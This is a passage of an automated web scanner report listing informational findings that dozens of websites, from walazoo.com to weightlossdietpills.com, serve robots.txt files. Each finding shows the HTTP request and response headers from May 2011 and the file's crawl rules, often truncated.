Request

GET /robots.txt HTTP/1.0
Host: www.walazoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:58 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 04:22:28 GMT
ETag: "13d3b18-10c-4db8eb84"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: text/plain

# Protect some url's from indexing to solve Google duplicate content issue.
# Thanks to twitch


User-agent: *
Disallow: /cache/
Disallow: /admin/
Disallow: /p/home/

# Uncomment next lines if you hav
...[SNIP]...

27.1732. http://www.waldameer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waldameer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.waldameer.com

Response

HTTP/1.1 200 OK
Content-Length: 38
Content-Type: text/plain
Last-Modified: Wed, 20 Jan 2010 21:52:23 GMT
Accept-Ranges: bytes
ETag: "1cc9f2d81a9aca1:9145"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:03:54 GMT
Connection: close

User-agent: *
Disallow: /include/


27.1733. http://www.waleg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waleg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.waleg.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:42 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 25 Apr 2008 11:14:44 GMT
ETag: "7ae151-330-44bb0ac4e9100"
Accept-Ranges: bytes
Content-Length: 816
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

27.1734. http://www.wallatrk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wallatrk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wallatrk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Dec 2007 17:23:49 GMT
ETag: "5da1c26-1d-f522d340"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rd/

27.1735. http://www.wanknews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wanknews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wanknews.com

Response

HTTP/1.0 200 OK
Content-Length: 94
Content-Type: text/plain
Date: Wed, 04 May 2011 12:06:53 GMT
Expires: Sat, 23-Nov-2010 14:11:20 GMT
Server: Apache

User-agent: *
Disallow: /ajax/
Disallow: /c/
Disallow: /p/
Disallow: /playlist/
Disallow: /t/

27.1736. http://www.wannabebig.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wannabebig.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wannabebig.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:22:33 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.wannabebig.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.wannabebig.com/sitemap.xml.gz

27.1737. http://www.wanttoknowit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wanttoknowit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wanttoknowit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Vary: Cookie
X-Pingback: http://wanttoknowit.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1738. http://www.warbirdinformationexchange.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warbirdinformationexchange.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warbirdinformationexchange.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:58 GMT
Server: Apache
Last-Modified: Sun, 08 Jan 2006 01:39:27 GMT
ETag: "1299-43c06d4f"
Accept-Ranges: bytes
Content-Length: 4761
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: BotRightHere
Disallow: /

User-agent: WebZip
Disallow: /

User-agent: larbin
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent
...[SNIP]...

27.1739. http://www.warehouseskateboards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warehouseskateboards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warehouseskateboards.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1296000
Content-Length: 422
Content-Type: text/plain
Last-Modified: Thu, 14 Oct 2010 19:11:54 GMT
Accept-Ranges: bytes
ETag: "d0bcda9d36bcb1:5367"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:40 GMT
Connection: close

# robots.txt file for http://www.warehouseskateboards.com/
# added by Sage Island 8-15-08

User-agent: *

Disallow: /admin
Disallow: /aspnet_client
Disallow: /css
Disallow: /dll
Disallow: /em
...[SNIP]...

27.1740. http://www.waroffilms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waroffilms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.waroffilms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:57 GMT
Server: Apache/2.2.17 (FreeBSD) PHP/5.3.5
Last-Modified: Thu, 23 Dec 2010 13:48:14 GMT
ETag: "181a617-18-498141f048380"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1741. http://www.warriortalknews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warriortalknews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warriortalknews.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web045
X-Webserver: oak-tp-web045
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Wed, 04 May 2011 00:44:23 GMT
X-Varnish: 3669547369 3624970283
Age: 34007
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Allow: /.m/
Disallow: /

User-agent: Y!J-SRD
Allow: /.m/
Dis
...[SNIP]...

27.1742. http://www.watchcartoononline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.watchcartoononline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watchcartoononline.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:29:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "149-4d7815f7-0"
Last-Modified: Thu, 10 Mar 2011 00:06:15 GMT
Content-Type: text/plain
Content-Length: 329
Vary: User-Agent

# robots.txt for http://www.watchcartoononline.com/

User-agent: *
Disallow: /?ref=
Sitemap: http://www.watchcartoononline.com/sitemap.xml
Sitemap: http://www.watchcartoononline.com/newvideositemap.xm
...[SNIP]...

27.1743. http://www.watchtheguild.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.watchtheguild.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watchtheguild.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:11:30 GMT
Server: Apache
Served-By: Joyent
X-XRDS-Location: http://www.watchtheguild.com/?xrds
X-Yadis-Location: http://www.watchtheguild.com/?xrds
X-Pingback: http://www.watchtheguild.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1744. http://www.wausaudailyherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wausaudailyherald.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wausaudailyherald.com

Response

HTTP/1.0 200 OK
Content-Length: 2571
Content-Type: text/plain
Last-Modified: Mon, 07 Mar 2011 21:51:43 GMT
Accept-Ranges: bytes
ETag: "8041b3d811ddcb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Wed, 04 May 2011 00:47:58 GMT
Connection: close

# Robots.txt
# Be nice.
#
Sitemap: http://www.wausaudailyherald.com/sitemap.xml
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbc
...[SNIP]...

27.1745. http://www.wayodd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wayodd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wayodd.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 04 Oct 2009 02:56:55 GMT
ETag: "b94800d-cb-4751326586bc0"
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 04:04:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /noindex
Disallow: /noindex1
Disallow: /noindex2
Disallow: /register
Disallow: /register.php
Disallow: /signin
Disallow: /signin.php
Sitemap: http://www.wayodd.com/sitemap.xml.
...[SNIP]...

27.1746. http://www.wcu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcu.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Nov 2005 16:03:24 GMT
Accept-Ranges: bytes
ETag: "be4a836dfef4c51:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:25:35 GMT
Connection: close
Content-Length: 104

# robots.txt for http://www.wcu.edu/
User-agent: *
Disallow: /ereserves/ # This is a protected space

27.1747. http://www.wcvirtualversion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcvirtualversion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcvirtualversion.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Wed, 04 May 2011 02:24:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=b40nk05kms7v7hn4jsi5s4adp6; expires=Wed, 04-May-2011 06:24:58 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=b40nk05kms7v7hn4jsi5s4adp6; expires=Thu, 03-May-2012 02:24:58 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

/sitemap.xml

#Unsafe robots to keep away
###

User-agent: *
Disallow: /reports/


Disallow: /publication*?*i=5642*
Disallow: /publication*?i=5642*
Disallow: /publication/?i=5642*
Disallow: /publicati
...[SNIP]...

27.1748. http://www.wdasfm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wdasfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4240851851 4240832573
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 03:36:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:36:04 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.1749. http://www.weather-alertssite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather-alertssite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather-alertssite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Sep 2009 22:53:12 GMT
ETag: "25c01ff-1a-473e1ff208600"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.1750. http://www.weather.com.cn/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com.cn
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather.com.cn

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Unix) DAV/2 SVN/1.4.6 mod_jk/1.2.26
Date: Thu, 05 May 2011 02:58:40 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Last-Modified: Fri, 23 Jul 2010 09:04:50 GMT
Connection: close
Expires: Sat, 04 Jun 2011 02:58:40 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: BIGipServerwww_pool=79234109.20480.0000; path=/

User-agent: *
Disallow:

27.1751. http://www.weatherforecastmap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weatherforecastmap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weatherforecastmap.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:25 GMT
Server: Apache
Last-Modified: Mon, 21 Sep 2009 19:51:02 GMT
ETag: "18d8a4-20-4741bcd2c1580"
Accept-Ranges: bytes
Content-Length: 32
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 03:05:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /php



27.1752. http://www.web-tracker.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.web-tracker.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.web-tracker.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:24 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 18:20:58 GMT
Accept-Ranges: bytes
Content-Length: 109
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /


27.1753. http://www.web2visit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.web2visit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.web2visit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:40:54 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 09:28:35 GMT
Accept-Ranges: bytes
Content-Length: 484
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 02:40:55 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /wp-*
Allow: /wp-content/uploads/
Allow : /*ftr=vidpgurl


User-agent: Mediapartners-Google
...[SNIP]...

27.1754. http://www.webbyplanet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webbyplanet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webbyplanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 29 Apr 2011 19:29:09 GMT
ETag: "12c34d2-d1-b013ab40"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /deal/
Disallow: /directory/
Disallow: /admin/
Disallow: /search/
Disallow: /coupons/
Disallow: /utility/
Sitemap: http://www.webbyplanet.com/sitemap.xml
User-agent: Yandex
Dis
...[SNIP]...

27.1755. http://www.webcash-assistance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcash-assistance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webcash-assistance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:23 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:07:31 GMT
ETag: "2591f25-e7-4d30ad03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1756. http://www.webdesign.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webdesign.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=ca1c7172590624eb905f6b62bc741080; expires=Wed, 04-May-2011 05:36:40 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=ca1c7172590624eb905f6b62bc741080; expires=Wed, 04-May-2011 05:36:40 GMT; path=/
Vary: Accept-Encoding
Content-Length: 92
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /search
Disallow: /forum
Disallow: /print
Disallow: /advanced-search

27.1757. http://www.webecoist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webecoist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webecoist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:52 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Last-Modified: Sat, 14 Aug 2010 08:31:44 GMT
ETag: "3bd0762-44-48dc46de9fc00"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

Sitemap: http://webecoist.com/sitemap.xml


27.1758. http://www.webmed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webmed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webmed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:59 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 19:26:55 GMT
Accept-Ranges: bytes
Content-Length: 473
Connection: close
Content-Type: text/plain

User-agent: Teoma
Disallow: /
User-agent: twiceler
Disallow: /
User-agent: Gigabot
Disallow: /
User-agent: Scrubby
Disallow: /
User-agent: Robozilla
Disallow: /
User-agent: Nutch
Disallow: /
User-agen
...[SNIP]...

27.1759. http://www.webreference.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webreference.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webreference.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:00 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 13:33:58 GMT
ETag: "6d62e-22b-4cff8946"
Accept-Ranges: bytes
Content-Length: 555
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /RealMedia/ads/
Disallow: /ads/
Disallow: /fcgi-bin/ipeclick.cgi/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /fax/
Disallow: /
...[SNIP]...

27.1760. http://www.webreserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webreserv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webreserv.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"91-1153223542000"
Last-Modified: Tue, 18 Jul 2006 11:52:22 GMT
Content-Type: text/plain
Content-Length: 91
Date: Wed, 04 May 2011 04:17:44 GMT
Connection: close

# /robots.txt file for http://www.webreserv.com

User-agent: *
Disallow: /login.do



27.1761. http://www.websugar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websugar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.websugar.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:08:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://www.websugar.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1762. http://www.webtvhub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webtvhub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webtvhub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 06 Sep 2007 00:15:00 GMT
ETag: "19e803a-164-4396c69bba900"
Accept-Ranges: bytes
Content-Length: 356
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /trackback/
Disallow: /date/
Disallow: /wp-*
Disallow: */trackback/
Disallow: /temp/
Disallow: */respond/
Disallow: /advertise/
Disallow: /author/
Disallow
...[SNIP]...

27.1763. http://www.webware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webware.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:50 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
Content-Length: 3968
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=969
Connection: Keep-Alive
Content-Type: text/plain

"# $Source: /cvs/main/ops/config/global/w/robots.txt,v $"
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /css/
Disallow:
...[SNIP]...

27.1764. http://www.webwarper.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webwarper.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webwarper.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:23 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 PHP/4.3.11
Last-Modified: Sun, 13 Mar 2011 12:07:06 GMT
ETag: "58c875-4a-4d7cb36a"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /avgz/
Disallow: /ww/

User-agent: *
Allow: /ww/0/

27.1765. http://www.wect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wect.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 03:23:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 03:23:15 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.1766. http://www.wedthemes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wedthemes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wedthemes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_tkt/2.0.2 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Last-Modified: Sat, 15 May 2010 14:40:04 GMT
ETag: "188000a-18-486a2f79e1900"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.1767. http://www.wego.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wego.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wego.com

Response

HTTP/1.1 200 OK
Server: nginx/ask J
Date: Wed, 04 May 2011 01:56:14 GMT
Content-Type: text/plain
Content-Length: 859
Last-Modified: Fri, 01 Apr 2011 10:41:29 GMT
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CUR ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM CNT STA"
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

User-agent: *
Crawl-delay: 5
Disallow: /hotels/search/create
Disallow: /hotels/*/*/progress
Disallow: /hotels/search/results
Disallow: /hotels/historical/ajax/js/
Disallow: /hotels/continue/
Disallow:
...[SNIP]...

27.1768. http://www.weight-loss-center.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weight-loss-center.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weight-loss-center.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:38 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 01 Feb 2009 01:55:32 GMT
ETag: "77d4185-1d-461d1bbb36d00"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /lib/

27.1769. http://www.weightlossdietpills.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weightlossdietpills.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weightlossdietpills.com

Response

HTTP/1.1 200 OK
